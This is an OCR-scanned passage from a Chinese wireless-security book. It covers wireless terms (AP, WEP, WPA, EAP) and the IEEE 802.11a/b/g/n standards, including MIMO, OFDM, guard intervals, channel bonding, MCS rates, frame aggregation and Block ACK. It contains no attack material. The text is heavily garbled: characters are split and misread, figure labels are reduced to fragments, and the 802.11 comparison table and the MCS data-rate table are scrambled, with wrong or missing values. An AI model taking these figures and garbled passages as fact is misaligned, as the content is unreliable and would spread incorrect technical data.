通行 的 标准 ， 其 目标 是 将 Intemet 的 丰富 信 
息 及 先进 的 业务 引入 到 移动 电话 等 无 线 终 
端 之 中 。 

(4) AP。Wireless Access Point， 无线 
访问 接 入 点 。AP 就 是 传统 有 线 网 络 中 的 
Hub， 也 是 组 建 小 型 无 线 局 域 网 时 最 常用 的 
设备 。AP 相当 于 一 个 连接 有 线 网 和 无 线 网 
的 桥梁 ， 其 主要 作用 是 将 各 个 无 线 网 络 客 
户 端 连接 到 一 起 ， 然 后 将 无 线 网 络 接 入 以 
太 网 。 


(5) WEP. WEP (Wired Equivalent Pri- 
vacy) 是 目前 比较 常用 的 无 线 网 络 认 证 机 
制 之 一 ， 它 是 802.11 定义 下 的 一 种 加 密 方 
式 ， 简 单 地 说 ， 就 是 先 在 无 线 AP 中 设 定 一 
组 密码 ， 使 用 者 要 连接 上 这 个 无 线 AP 时 ， 
必须 输入 设置 的 密码 才能 连接 上 ， 可 以 有 
效 防止 非法 用 户 窃听 或 侵入 无 线 网 络 。 

(6) WPA。WPA (WiFi Protected Ac- 
cess) 是 一 种 基于 标准 的 可 互 操 作 的 WLAN 
安全 性 增强 解决 方案 ， 可 大 大 增强 现 有 以 
及 未 来 无 线 局 域 网 系统 的 数据 保护 和 访问 
控制 水 平 。 分 为 个 人 WPA-Personal 与 企业 
WPA-Enterprise 两 种 。 

(7) EAP。EAP (Extensible Authentica- 
tion Protocol， 扩 展 认 证 协议 ) 是 一 种 用 于 
验证 网 络 设备 身份 的 鉴 权 机 制 。 

(8) GPS。 (Global Positioning System 
全 球 定位 系统 ) 又 称 全 球 卫星 定位 系统 ， 是 
一 个 中 距离 圆 形 轨道 卫星 导航 系统 。 它 可 
以 为 地 球 表面 绝 大 部 分 地 区 (98%) 提供 准 
确 的 定位 、 测 速 和 高 精度 的 时 间 标 准 。 


1.6 小 试 身手 


练习 1: 认识 无 线路 由 器 。 
练习 2: 查看 网 卡 的 实体 结构 。 
练习 3: 查看 天 线 的 实体 结构 。 


第 2 音 ”无 线 网 络 攻防 必 备 知识 


作为 无 线 网 络 中 的 计算 机 或 终端 设备 用 户 ， 要 想 使 自己 的 设备 不 受 或 少 受 黑客 的 攻 
击 ， 就 必须 了 解 一 些 黑客 常用 的 入 侵 手 段 以 及 学 习 一 些 无 线 网 络 安全 方面 的 基础 知识 ， 本 
章 介绍 有 关 这 方面 的 内 容 ， 如 无 线 网 络 的 协议 标准 、802.11n 协 议 的 关键 技术 、IP 地 址 、 


MAC 地 址 、 端 口 以 及 黑客 常用 的 DOS 命 令 等 。 


无 线 网 络 协议 标准 


无 线 局 域 网 络 (Wireless Local Area Net- 
works，WLAN) 利用 射频 (Radio Frequen- 
cy，RF) 或 是 红外 线 (InfraRed，IR) 的 技 
术 ， 以 无 线 的 方式 连接 两 部 或 多 部 需要 交换 
数据 的 计算 机 设备 ， 利 用 无 线 的 高 移动 性 来 
应 用 于 各 个 需要 的 应 用 领域 之 中 。 

无 线 网 络 的 通信 协议 标准 为 IEEE 802.11 
协议 族 ， 主 要 包括 IEEE 802.11、IEEE 
802.11b、 IEEE 802.11a、 IEEE 802.11g、 
IEEE 802.11n 等 。 其 中 ，IEEE 802.11n 是 在 
IEEE 802.11g 和 IEEE 802.11a 之 上 发 展 起 来 
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的 一 项 技术 ， 最 大 的 特点 是 速率 提升 ， 理 
论 速率 最 高 可 达 600Mb/s， 而 目前 业界 主流 
为 300Mb/s。 下 图 为 IEEE 802.11 协 议 族 相互 
之 间 的 关系 。 


IMAC 


BB 


We 
TT 


IEEE 802.11 协 议 族 各 个 协议 发 布 的 时 
间 以 及 使 用 频率 等 信息 见 下 表 。 


表 ”802.11 协 议 族 的 详细 信息 


IEEE 802.11 IEEE 802.11b IEEE 802.11a IEEE 802.11g 

标准 发 布 时 间 1997.7 1999.9 1999.9 2003.6 

合法 频率 83.5MHz 83.5MHz 32.5MHz 83.5MHz 
5.150~5.350GHz 

频率 范 2.400 一 2.483GHz | 2.400 一 2.483GHz 2.400 一 2.483GHz 
5.725 一 5.850GHz 

非 重 登 信道 a 12 3 

调制 技术 FHSS/DSSS OFDM CCK/OFDM 

呈 6 9， 12, 18, 24, |6: 9. 12, 18，24， 
物 汪 澳洲 汕 素 36, 48, 54 36, 48, 54 
论 上 的 UDP 

人 7.1Mb/s 30.9Mb/s 30.9Mb/s 

量 (1500 byte) 

更 从 上 的 最 去 TCR 和 5.9Mb/s 24.4Mb/s 24.4Mb/s 

吐 量 (1500 byte) 

兼容 性 与 11g 可 互通 与 11b/g 不 能 互通 与 11b 可 互通 

无 线 覆 盖 范 围 100m 50m <100m 


黑客 攻防 与 无 线 安 全 从 新 手 到 高 手 ( 超 值 版 ) 


2.1.1 |IEEE 802.11 


IEEE 802.11 是 无 线 局 域 网 通用 的 标 
准 ， 它 是 由 IEEE 所 定义 的 无 线 网 络 通信 的 
标准 。 虽 然 WiFi 使 用 了 IEEE 802.11 的 媒体 
访问 控制 层 (MAC) 和 物理 层 (PHY) ， 
但 是 两 者 并 不 完全 一 致 。 

IEEE 802.11 采 用 2.4GHz 和 5GHz 这 两 个 
ISM 频 段 。 其 中 2.4GHz 的 I SM 频段 被 世界 
上 绝 大 多 数 国家 采用 ，5GHz ISM 频 段 在 一 
些 国家 和 地 区 的 使 用 情况 比较 复杂 ， 加 上 
高 载波 频率 所 带 来 了 负面 效果 ， 使 得 IEEE 
802.11 的 普及 受到 了 限制 ， 即 使 它 是 协议 
组 的 原始 标准 。 


2.1.2 IEEE 802.11a 


IEEE 802.11a 是 IEEE 802.11 原 始 标 准 的 


。 第 一 个 修订 标准 ， 于 1999 年 9 月 获得 批准 。 


IEEE 802.11a 标 准 采用 了 与 原始 标准 相同 的 
核心 协议 ， 工 作 频 率 为 SGHz， 最 大 原始 数 
据 传 输 率 为 54Mb/s， 达 到 了 现实 网 络 中 等 
吞吐 量 (20Mb/s〉 的 要 求 。 

IEEE 802.11a 的 传输 技术 为 多 载波 调 
制 技术 ， 被 广泛 应 用 在 办 公 室 、 家 庭 、 宾 
馆 、 机 场 等 众多 场合 。 它 工作 在 5GHzU- 
NII 频 带 ， 物 理 层 速率 可 达 54Mb/s， 传 输 
层 可 达 25Mb/s， 可 提供 25Mb/s 的 无 线 ATM 
接口 和 10Mb/s 的 以 太 网 无 线 帧 结构 接口 ， 
以 及 TDD/TDMA 的 空中 接口 ， 支持 语 音 、 
数据 、 图 像 业 务 ; 一 个 扇 区 可 接 入 多 个 用 
户 ， 每 个 用 户 可 带 多 个 用 户 终端 。 

由 于 2.4GHz 频 带 已 经 被 广泛 使 用 ， 采 
用 5GHz 的 频带 让 IEEE 802.11a 具 有 更 少 冲 突 
的 优点 。 然 而 ， 高 载波 频率 也 带 来 了 负面 效 
果 。IEEE 802.11a 几 乎 被 限制 在 直线 范围 内 
使 用 ， 这 导致 必须 使 用 更 多 的 接 入 点 ; 同样 
还 意味 着 IEEE 802.11a 的 传播 范围 不 大 。 


2.1.3 /IEEES802T1D 
IEEE 802.11b 的 出 现 是 为 了 解决 传输 速 


率 低 的 问题 ， 如 以 前 无 线 局 域 网 的 速率 只 
有 1~2Mb/s， 而 许多 应 用 也 是 根据 10Mb/s 
以 太 网 速率 设计 的 ， 限 制 了 无 线 产 品 的 应 
用 种 类 。IEEE 802.11b 从 根本 上 改变 了 无 线 
局 域 网 的 设计 和 应 用 现状 。 

1. IEEE 802.11b 标 准 简介 


IEEE 802.11b 无 线 局 域 网 的 带宽 最 高 可 
达 11Mb/s， 比 IEEE 802.11 标 准 快 5 倍 ， 扩 大 
了 无 线 局 域 网 的 应 用 领域 。 另 外 也 可 根据 
实际 情况 采用 5.5Mb/s、2 Mb/s 和 1 Mb/s 带 
宽 ， 实 际 的 工作 速度 在 5Mb/s 左 右 ， 与 普通 
的 10Base-T 规 格 有 线 局 域 网 几乎 是 处 于 同一 
水 平 。 作 为 公司 内 部 的 设施 ， 可 以 基本 满 
足 使 用 要 求 。IEEE 802.11b 使 用 的 是 开放 的 
2.4GHz 频 段 ， 不 需要 申请 就 可 使 用 。 既 可 
作为 对 有 线 网 络 的 补充 ， 也 可 独立 组 网 ， 
从 而 使 网 络 用 户 摆脱 网 线 的 束缚 ， 实 现 真 
正 意义 上 的 移动 应 用 。 

2. IEEE 802.11b 优 点 


IEEE 802.11b 具 有 如 下 优点 : 

(1) 使 用 范围 。IEEE 802.11b 支 持 以 
百 米 为 单位 的 范围 (在 室外 为 300m; 在 办 
公 环 境 中 最 长 为 100m) 。 

(2) 可 靠 性 。 与 以 太 网 类 似 的 连接 协 
议和 数据 包 确认 ， 来 提供 可 靠 的 数据 传送 
和 网 络 带 宽 的 有 效 使 用 。 

(3) 互 用 性 。 与 以 前 的 标准 不 同 的 
是 ，IEEE 802.11b 只 允许 一 种 标准 的 信号 发 
送 技术 ， 产 品 的 互 用 性 较 强 。 

(4) 电源 管理 。IEEE 802.11b 提 供 了 
网 卡 休眠 模式 ， 访 问 点 将 信息 缓冲 到 AP 
端 ， 延 长 了 电池 的 寿命 。 

(5) 漫游 支持 。 当 用 户 在 楼 房 或 公司 
部 门 之 间 移 动 时 ， 人 允许 在 访问 点 之 间 进 行 
无 颖 连接 。 

3. IEEE 802.11b 运 作 模 式 


IEEE 802.11b 运 作 模 式 基 本 分 为 两 种 : 
点 对 点 模式 和 基本 模式 。 下 面 进行 详细 介绍 : 


(1) 点 对 点 模式 ， 是 指 无 线 网 卡 和 无 线 
网 卡 之 间 的 通信 方式 ， 只 要 PC 插 上 无 线 网 
卡 即 可 与 另 一 台 具 有 无 线 网 卡 的 PC 连接 ， 
对 于 小 型 的 无 线 网 络 来 说 ， 是 一 种 方便 的 
连接 方式 ， 最 多 可 连接 256 台 PC。 

(2) 基本 模式 ， 是 指 无 线 网 络 规模 扩 
充 或 无 线 和 有 线 网 络 并 存 时 的 通信 方式 ， 
这 是 IEEE 802.11b 最 常用 的 方式 。 此 时 ， 
插 上 无 线 网 卡 的 PC 需要 由 接 入 点 与 另 一 
台 PC 连接 ， 接 入 点 负责 频段 管理 及 漫游 等 
指挥 工作 ， 一 个 接 入 点 最 多 可 连接 1024 台 
PC 无线 网 卡 )。 


4. IEEE 802.11b 的 典型 解决 方案 


IEEE 802.11b 无 线 局 域 网 由 于 其 便利 性 
和 可 伸缩 性 ， 特 别 适用 于 小 型 办 公 环 境 和 
家 庭 网 络 。 在 室内 环境 中 ， 针 对 不 同 的 实 
际 情况 可 以 有 不 同 的 解决 方案 。 

(1) 对 等 解决 方案 。 对 等 解决 方案 是 一 
种 最 简单 的 应 用 方案 ， 只 要 给 每 台 计算 机 安 
装 一 片 无 线 网 卡 ， 即 可 相互 访问 。 如 果 需 要 
与 有 线 网 络 连接 ， 可 以 为 其 中 一 台 计算 机 再 
安装 一 片 有 线 网 卡 ， 无 线 网 中 其 余 计 算 机 即 
利用 这 台 计 算 机 作为 网 关 ， 访 问 有 线 网 络 或 
共享 打印 机 等 设备 。 

但 对 等 解决 方案 是 一 种 点 对 点 方案 ， 
网 络 中 的 计算 机 只 能 一 对 一 互相 传递 信 
息 ， 而 不 能 同时 进行 多 点 访问 。 如 果 要 实 
现 与 有 线 局 域 网 一 样 的 互通 功能 ， 则 必须 
借助 接 入 点 。 

(2) 单 接 入 点 解决 方案 。 接 入 点 相当 
于 有 线 网 络 中 的 集线器 。 无 线 接 入 点 可 以 
连接 周边 的 无 线 网 络 终端 ， 形 成 星 型 网 
络 结构 ， 同 时 通过 10Base-T 端口 与 有 线 网 
络 相连 ， 使 整个 无 线 网 的 终端 都 能 访问 有 
线 网 络 的 资源 ， 并 可 通过 路 由 器 访问 外 部 
网 络 。 


2.1.4 |IEEE 802.11g 
与 之 前 的 IEEE 802.11 协 议 标 准 相 比 ， 
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IEEE 802.11g 草 案 有 以 下 两 个 特点 : 一 是 在 
2.4GHz 频 段 使 用 正 交 频 分 复 用 (OFDM) 
调制 技术 ， 使 数据 传输 速率 提高 到 20Mb/s 以 
上 ; 二 是 能 够 与 IEEE 802.11b 的 WiFi 系 统 互 
联 互通 ， 可 共存 于 同一 AP 的 网 络 里 ， 从 而 
保障 了 后 向 兼容 性 。 这 样 原 有 的 WLAN 系 
统 可 以 平滑 地 向 高 速 WLAN 过 渡 ， 延 长 了 
IEEE 802.11b 产 品 的 使 用 寿命 ， 从 而 降低 
了 用 户 的 投资 。 

IEEE 802.11g 的 物理 帧 结构 分 为 前 导 信 
号 (Preamble) 、 信 头 Header 和 负载 Pay- 
load。Preamble 主 要 用 于 确定 STA 和 AP 之 间 
何 时 发 送 和 接收 数据 ， 传 输 进行 时 告知 其 
他 STA 以 免 冲突 ， 同 时 传送 同步 信号 及 帧 间 
隔 。Preamble 完 成 后 ， 接 收 方才 开始 接收 数 
据 。Header 在 Preamble 之 后 ， 用 来 传输 一 些 
重要 的 数据 ， 例 如 负载 长 度 、 传 输 速率 、 
服务 等 信息 。 由 于 数据 率 及 要 传送 字 节 的 
数量 不 同 ，Payload 的 包 长 变化 很 大 ， 可 以 
十 分 短 也 可 以 十 分 长 。 在 一 帧 信号 的 传输 
过 程 中 ，Preamble 和 Header 所 占 的 传输 时 
间 越 多 ，Payload 用 的 传输 时 间 就 越 少 ， 传 
输 的 效率 就 越 低 。 

综合 上 述 3 种 调制 技术 的 特点 ，IEEE 
802.11g 采 用 了 OFDM 等 关键 技术 来 保障 
其 优越 的 性 能 ， 分 别 对 Preamble、Header、 
Payload 进 行 调制 ， 这 种 帧 结构 称 为 OFDM/ 
OFDM 方 式 。IEEE 802.11g 兼 容 性 指 的 是 
IEEE 802.11g 设 备 能 和 IEEE 802.11b 设 备 
在 同一 个 AP 节点 网 络 里 互联 互通 。IEEE 
802.11g 的 一 个 最 大 特点 就 是 要 保障 与 IEEE 
802.11bWiFi 系 统 兼 容 ，IEEE 802.11g 可 以 
接收 OFDM 和 CCK 数 据 ， 但 传统 的 WiFi 
系统 只 能 接收 CCK 信 息 ， 这 就 产生 了 一 
个 问题 ， 即 在 两 者 共存 的 环境 中 如 何 解 
决 由 于 IEEE 802.11b 不 能 解 调 OFDM 格 式 
信息 帧 头 所 带 来 的 冲突 问题 ， 而 为 了 解决 
上 述 问题 ，IEEE 802.11g 采 用 了 RTS/CTSm 
技术 。 
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IEEE 802.11n 


IEEE 802.11n 是 在 IEEE 802.11g 和 IEEE 
802.11a 的 基础 上 发 展 起 来 的 一 项 技术 ， 
最 大 的 特点 是 速率 提升 ， 理 论 速率 最 高 可 
达 600Mb/s( 目 前 业界 主流 为 300Mb/s) ， 
IEEE 802.11n 可 工作 在 2.4GHz 和 5GHz 两 个 
频段 。 

IEEE 802.11n 对 用 户 应 用 的 另 一 个 重要 
好 处 是 无 线 覆 盖 的 改善 。 由 于 采用 了 多 天 
线 技术 ， 无 线 信 号 (对 应 同一 条 信道 ) 将 
通过 多 条 路 径 从 发 射 端 到 接收 端 ， 从 而 提 
供 了 分 集 效应 。 

另外 ， 除 了 吞吐 和 覆盖 的 改善 ，IEEE 
802.11n 技 术 还 有 一 个 重要 的 功能 就 是 要 兼 
容 传统 的 EEE 802.11 a/b/g， 以 保证 现 有 网 
络 的 运行 。 


2.2 IEEE 802.11n 协 议 的 关键 
技术 

IEEE 802.11n 主 要 是 结合 物理 层 和 

MAC 层 的 优化 来 充分 提高 WLAN 技 术 的 

吞吐 。 主 要 的 物理 层 技术 涉及 了 MIMO、 


MIMO-OFDM、40MHz、Short GI 等 技术 ， 
从 而 将 物理 层 吞吐 提高 到 600Mb/s。 


物理 层 关键 技术 


IEEE 802.11n 中 涉及 的 物理 层 关 键 技术 
包括 MIMO、SDM、MIMO-OFDM、FEC、 

Short Guard Interval、40MHz 绑 定 技术 、 

MCS、MRC 等 ， 下 面 进行 详细 介绍 。 


1. MIMO 


MIMO 是 IEEE 802.11n 物 理 层 的 核心 ， 
指 的 是 一 个 系统 采用 多 个 天 线 进行 无 线 信 
号 的 收发 。 右 上 图 为 MIMO 的 架构 示意 图 。 
它 是 当今 无 线 最 热门 的 技术 ， 无 论 是 4G、 
IEEE 802.16e WIMAX， 还 是 IEEE 802.1ln， 
都 把 MIMO 列 入 射频 的 关键 技术 。 
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MIMO 主 要 有 如 下 的 典型 应 用 ， 包 括 : 

(1) 提高 吞吐 。 通 过 增加 多 通道 ， 并 
发 传 传递 数据 ， 可 以 成 倍 提高 系统 吞吐 。 

(2) 提高 无 线 链 路 的 健壮 性 和 改善 接 
收 端的 SNR。 通 过 多 条 通道 ， 无 线 信号 通 
过 多 条 路 径 从 发 射 端 到 达 接 收 端 多 个 接收 
天 线 。 由 于 经 过 多 条 路 径 传播 ， 多 条 路 径 
不 会 同时 出 现 严重 衰竭 ， 采 用 某 种 算法 把 
这 些 多 个 信号 进行 综合 计算 ， 可 以 改善 接 
收 端的 SNR。 需 要 注意 的 是 ， 这 里 是 同一 
条 数据 在 多 个 路 径 上 传递 了 多 份 ， 并 不 能 
够 提高 吞吐 。 


2. SDM 

当 基 于 MIMO 同 时 传递 多 条 独立 信道 
(spatial streams) ， 下 图 为 通过 MIMO 传 递 
多 条 信道 的 示意 图 ， 信 道 X1、X2 进 行 传递 
时 ， 将 成 倍 地 提高 系统 的 吞吐 。 


4 
To@ 


MIMO 系 统 支持 信道 的 数量 取决 于 发 
送 天 线 和 接收 天 线 的 最 小 值 。 如 发 送 天 线 
数量 为 3， 而 接收 天 线 数量 为 2， 则 支持 的 
信道 为 2。MIMO/SDM 系 统一 般 用 “发 射 天 
线 数量 X 接 收 天 线 数 量 ” 表 示 。 如 上 图 为 
2X2 MIMO/SDM 系 统 。 显 然 ， 增 加 天 线 可 
以 提高 MIMO 支 持 的 信道 数 。 但 是 综合 
本 、 实 际 效果 等 多 方面 因素 ， 目 前 业界 的 
WLAN AP 都 普遍 采用 3X3 的 模式 。 

MIMO/SDM 是 在 发 射 端 和 接收 端 之 
间 ， 通 过 存在 的 多 条 路 径 〈 通 道 ) 来 同时 
传播 多 条 流 。 一 直 以 来 ， 无 线 技术 〈 如 


OFMD) 总 是 企图 克服 多 径 效 应 的 影响 ， 而 
MIMO 人 恰恰 是 在 利用 多 径 来 传输 数据 ， 下 图 
为 MIMO 利 用 多 路 径 传输 数据 示意 图 。 


Xl Yh 


3. MIMO-OFDM 


在 室内 等 典型 应 用 环境 下 ， 由 于 多 径 
效应 的 影响 ， 信 号 在 接收 端 很 容易 发 生 符 
号 间 干 扰 (ISI) ， 从 而 导致 丢 包 率 增高 。 
OFDM 调 制 技术 是 将 一 个 物理 信道 划分 为 多 
个 子 载体 〈sub-carrier) ， 将 高 速率 的 信道 
调制 成 多 个 较 低速 率 的 子 信道 ， 通 过 这 些 
子 载体 进行 通信 ， 从 而 减少 ISI 机 会 ， 提 高 
物理 层 吞 吐 。 

OFDM 在 IEEE 802.11a/g 时 代 已 经 成 熟 
使 用 ， 到 了 IEEE 802.11n 时 代 ， 它 将 MIMO 
支持 的 子 载体 从 52 个 提高 到 56 个 。 需 要 注 
意 的 是 ， 无 论 IEEE 802.11a/g， 还 是 IEEE 
802.11n， 它 们 都 使 用 了 4 个 子 载体 作为 
pilot 子 载体 ， 而 这 些 子 载体 并 不 用 于 数据 
的 传递 。 所 以 IEEE 802.11n MIMO 将 物理 
速率 从 传统 的 54Mb/s 提 高 到 58.5Mb/s〔 即 
54X52/48) 。 


4. FEC (Forward Error Correction) 


按照 无 线 通 信 的 基本 原理 ， 为 了 使 信 
息 适 合 在 无 线 信 道 这 样 不 可 靠 的 媒介 中 传 
递 ， 发 射 端 将 把 信息 进行 编码 并 携带 元 余 
信息 ， 以 提高 系统 的 纠 错 能 力 ， 使 接收 端 
能 够 恢复 原始 信息 。IEEE 802.11n 所 采用 的 
QAM-64 编 码 机 制 可 以 将 编码 率 (有效 信 
息 和 整个 编码 的 比率 ) 从 3/4 提高 到 5/6。 
所 以 ， 对 于 一 条 信道 ， 在 MIMO-OFDM 基 
础 之 上 ， 物 理 速 率 从 58.5Mb/s 提 高 到 65Mb/s 
( 即 58.5X5/6 二 3/4) 。 右 图 为 改变 数据 排 
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序 示意 图 ， 改 变数 据 的 摆 列 方式 由 原先 的 
圆 形 数据 改 为 方形 数据 ， 这 样 使 得 空间 利 
用 更 加 合理 。 


5. Short Guard Interval 〈GI) 


由 于 多 径 效 应 的 影响 ， 信 息 符 号 
(Information Symbol) 将 通过 多 条 路 径 传 
递 ， 可 能 会 发 生 彼 此 碰撞 ， 导 致 ISI 干 扰 。 
为 此 ，IEEE 802.11a/g 标 准 要 求 在 发 送信 
息 符 号 时 ， 必 须 保证 在 信息 符号 之 间 存 在 
800 ns 的 时 间 间 隔 ， 这 个 间隔 被 称 为 Guard 
Interval (GI) 。IEEE 802.11n 仍 然 使 用 默认 
的 800 ns GI。 当 多 径 效应 不 是 很 严重 时 ， 
用 户 可 以 将 该 间隔 配置 为 400， 对 于 一 条 信 
道 ， 可 以 将 吞吐 提高 近 10%， 即 从 65Mb/s 
提高 到 72.2Mb/s。 对 于 多 径 效 应 较 明显 的 环 
境 ， 不 建议 使 用 Short Guard Interval (GI) 。 


6. 40MHz 绑 定 技术 


这 个 技术 最 为 直观 : 对 于 无 线 技术 ， 
提高 所 用 频谱 的 宽度 ， 可 以 最 为 直接 地 提 
高 吞吐 。 就 好 比 是 宽松 的 河道 ， 水 流通 过 
率 自 然 提高 。 传 统 IEEE 802.11a/g 使 用 的 频 
宽 是 20MHz， 而 IEEE 802.11n 支 持 将 相 邻 两 
个 频 宽 绑 定 为 40MHz 来 使 用 ， 所 以 可 以 最 
直接 地 提高 吞吐 。 

需要 注意 的 是 : 对 于 一 条 信道 ， 并 不 
仅仅 是 将 吞吐 从 72.2 Mb/s 提 高 到 144.4( 即 
72.2X2) Mb/s。 对 于 20MHz 频 宽 ， 为 了 减 
少 相 邻 信 道 的 干扰 ， 在 其 两 侧 预 留 了 一 小 
部 分 的 带宽 边界 ， 通 过 40MHz 绑 定 技术 ， 
这 些 预 留 的 带宽 也 可 以 用 来 通信 ， 可 以 将 
子 载体 从 104 (52X2) 提高 到 108Mb/s。 按 
照 72.2X2X108/104 进 行 计算 ， 所 得 到 的 吞 
吐 能 力 达 到 了 150Mb/s。 
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7. MCS (Modulation Coding Scheme) 


在 IEEE 802.11a/b/g 时 代 ， 配 置 AP 工 作 的 速率 非常 简单 ， 只 要 指定 特定 radio 类 型 
(802.11a/b/g〉 所 使 用 的 速率 集 ， 速 率 范围 从 1Mb/s 到 54Mb/s， 一 共有 12 种 可 能 的 物理 速 


率 ， 见 下 表 。 
表 配置 AP 工作 速率 表 
传输 速率 〈Mb/s) 
MCS index 信道 数量 | 调制 方式 20MHz 带 宽 40MHz 带 宽 
800ns 帧 间距 | 400ns 帧 间距 | 800ns 帧 间距 | 400ns 帧 间距 
0 1 BPSK 5 15 
1 1 QPSK 27 30 
2 1 QPSK 40.5 45 
3 16-QAM 54 60 
4 1 16-QAM 81 90 
5 1 64-QAM 106 120 
6 1 64-QAM 121.5 135 
7 1 64-QAM 1 150 
8 2 BPSK 27 30 
9 2 QPSK 54 60 
10 2 QPSK 81 90 
11 4 16-QAM 108 120 
12 2. 16-QAM 162 180 
13 2 64-QAM 216 240 
14 3 64-QAM 243 270 
15 全 64-QAM 130 | 1444 | 270 300 


到 了 IEEE 802.11n 时 代 ， 由 于 物理 速 
率 依赖 于 调制 方法 、 编 码 率 、 信 道 数量 、 
是 否 40MHz 绑 定 等 多 个 因素 。 这 些 影 响 知 
吐 的 因素 组 合 在 一 起 ， 将 产生 非常 多 的 物 
理 速率 供 选择 使 用 。 比 如 基于 Short GI， 
40MHz 绑 定 等 技术 ， 在 4 条 信道 的 条 件 下 ， 
物理 速率 可 以 达到 600Mb/s( 即 4X150) 。 
为 此 ，IEEE 802.11n 提 出 了 MCS 的 概念 。 
MCS 可 以 理解 为 这 些 影响 速率 因素 的 完整 
组 合 ， 每 种 组 合用 整数 来 唯一 标示 。 对 于 
AP、MCS 普 遍 支 持 的 范围 为 0 一 15。 


8. MRC (Maximal-Ratio Combining) 
MRC 和 吞吐 提高 没有 任何 关系 ， 它 的 


目的 是 改善 接收 端的 信号 质量 。 基 本 原理 
是 : 对 于 来 自发 射 端的 同一 个 信号 ， 由 于 
在 接收 端 使 用 多 天 线 接收 ， 那 么 这 个 信号 
将 经 过 多 条 路 径 〈 多 个 天 线 ) 被 接收 端 所 
接收 。 多 个 路 径 质量 同时 差 的 概率 非常 小 ， 
一 般 总 有 一 条 路 径 的 信号 较 好 。 那 么 在 接收 
端 可 以 使 用 某 种 算法 ， 对 各 条 接收 路 径 上 的 
信号 进行 加 权 汇总 (显然 ， 信 号 最 好 的 路 
径 分 配 最 高 的 权重 ) ， 实 现 接收 端的 信号 改 
善 。 当 多 条 路 径 上 信号 都 不 太 好 时 ， 仍 然 通 
过 MRC 技 术 获 得 较 好 的 接收 信号 。 


2.2.2 ”MAC 层 关键 技术 
MAC 层 的 技术 主要 针对 帧 聚合 技术 、 


Block ACK 以 及 兼容 IEEE 802.11a/b/g 
协议 ， 其 中 ， 帧 聚合 包含 针对 MSDTU 的 
聚合 (A-MSDU) 和 针对 MPDU 的 聚合 
(A-MPDU) 。 


1.A-MSDU 


A-MSDU 技 术 是 指 把 多 个 MSDU 通 过 一 
定 的 方式 聚合 成 一 个 较 大 的 载荷 。 下 图 为 
A-MSDU 结 构 示意 图 ， 这 里 的 MSDU 可 以 认 
为 是 以 太 网 报 文 。 


AMSDU 了 

通常 当 AP 或 无 线 客户 端 从 协议 栈 收 到 
报 文 (MSDU) 时 ， 会 打上 以 太 网 报 文 头 ， 
它 被 称 为 A-MSDU Subframe; 而 在 通过 
射频 口 发 送出 去 前 ， 需 要 一 一 将 其 转换 成 
802.11 报 文 格式 。 而 A-MDSU 技 术 旨 在 将 若 
干 个 A-MSDU Subframe 聚 合 到 一 起 ， 并 封 
装 为 一 个 802.11 报 文 进行 发 送 。 从 而 减少 了 
发 送 每 一 个 802.11 报 文 所 需 的 PLCP Pream- 
ble，PLCP Header 和 802.11 MAC 头 的 开销 ， 
同时 减少 了 应 答 帧 的 数量 ， 提 高 了 报 文 发 
送 的 效率 。 

A-MSDU 报 文 是 由 若干 个 A-MSDU 
Subframe 组 成 的 ， 每 个 Subframe 均 是 由 
Subframe header (Ethernet Header) 、 一 个 
MSDU 和 0 一 3 字 节 的 填充 组 成 。 

MSDU 技 术 只 适用 于 所 有 MSDU 的 目的 
端 为 同一 个 HT STA 的 情况 。 


2.A-MPDU 


与 A-MSDU 不 同 的 是 ，A-MPDU 聚 合 
是 经 过 802.11 报 文 封装 后 的 MPDU， 这 里 的 
MPDU 是 指 经 过 802.11 封 装 过 的 数据 帧 ， 右 
图 为 A-MPDU 结 构 示 意图 。 
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PLCP | MAC MAC MAC 


通过 一 次 性 发 送 若 干 个 MPDU， 减 少 
了 发 送 每 个 802.11 报 文 所 需 的 PLCP Pream- 
ble，PLCP Header， 从 而 提高 系统 吞吐 量 。 

其 中 MPDU 格 式 和 802.11 定 义 的 相同 ， 
而 MPDU Delimiter 是 为 了 使 用 A-MPDU 而 定 
义 的 新 的 格式 。A-MPDU 技 术 同 样 只 适用 
于 所 有 MPDU 的 目的 端 为 同一 个 HT STA 的 
情况 。 


3. Block ACK 


为 保证 数据 传输 的 可 靠 性 ，IEEE 802.11 
协议 规定 每 收 到 一 个 单 播 数 据 帧 ， 都 必须 立 
即 回应 以 ACK 帧 。A-MPDU 的 接收 端 在 收 
到 A-MPDU 后 ， 需 要 对 其 中 的 每 一 个 MPDU 
进行 处 理 ， 因 此 同样 针对 每 一 个 MPDU 发 送 
应 答 帧 。Block Acknowledgement 通 过 使 用 
一 个 ACK 帧 来 完成 对 多 个 MPDU 的 应 答 ， 
以 降低 这 种 情况 下 的 ACK 帧 的 数量 。 

Block Ack 机 制 分 三 个 步骤 来 实现 : 

(1) 通过 ADDBA Request/Response 报 
文 协商 建立 Block ACK 协 定 。 

(2) 协商 完成 后 ， 发 送 方 可 以 发 送 有 
限 多 个 QoS 数据 报 文 ， 接 收 方 会 保留 这 些 数 
据 报 文 的 接收 状态 ， 待 收 到 发 送 方 的 Block- 
AckReq 报 文 后 ， 接 收 方 则 回应 以 BlockAck 
报 文 来 对 之 前 接收 到 的 多 个 数据 报 文 做 一 
次 性 回复 。 

(3) 通过 DELBA Request 报 文 来 撤销 
一 个 已 经 建立 的 Block Ack 协 定 。 
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4. 兼容 802.11a/b/g 


WLAN 标 准 从 802.11a/b 发 展 到 
802.11g， 再 到 现在 的 802.11n， 提 供 良 好 的 
向 后 兼容 性 是 非常 重要 的 。802.11g 提 供 了 


| 一 套 保 护 机 制 来 允许 802.11b 的 无 线 用 户 接 


入 802.11g 网 络 。 同 样 地 ，802.11n 协 议 提供 
相似 的 机 制 来 允许 802.11a/b/g 用 户 的 接 入 。 

802.11n 设 备 发 送 的 信号 可 能 无 法 被 
802.11a/b/g 的 设备 解析 到 ， 造 成 802.11a/ 
b/g 设备 无 法 探测 到 802.11n 设 备 ， 从 而 往 
空中 直接 发 送信 号 ， 导 致 信道 使 用 上 的 冲 
突 。 为 解决 这 个 问题 ， 当 802.11n 运 行 在 混 
合 模式 ( 即 同时 有 802.11a/b/g 设 备 在 网 络 
中 ) 时 ， 会 在 发 送 的 报 文 头 前 添加 能 够 被 
802.11a 或 802.11b/g 设 备 正确 解析 的 前 导 码 。 
从 而 保证 802.11a/b/g 设 备 能 够 侦 听 到 802.1ln 
信号 ， 并 启用 冲突 避免 机 制 ， 进 而 实现 
802.11n 的 设备 与 802.11a/b/g 设 备 的 互通 。 

802.11n 向 下 兼容 802.11a/g，802.11a/g 
的 终端 接 入 802.11n 网 络 后 ， 由 于 MIMO 技 
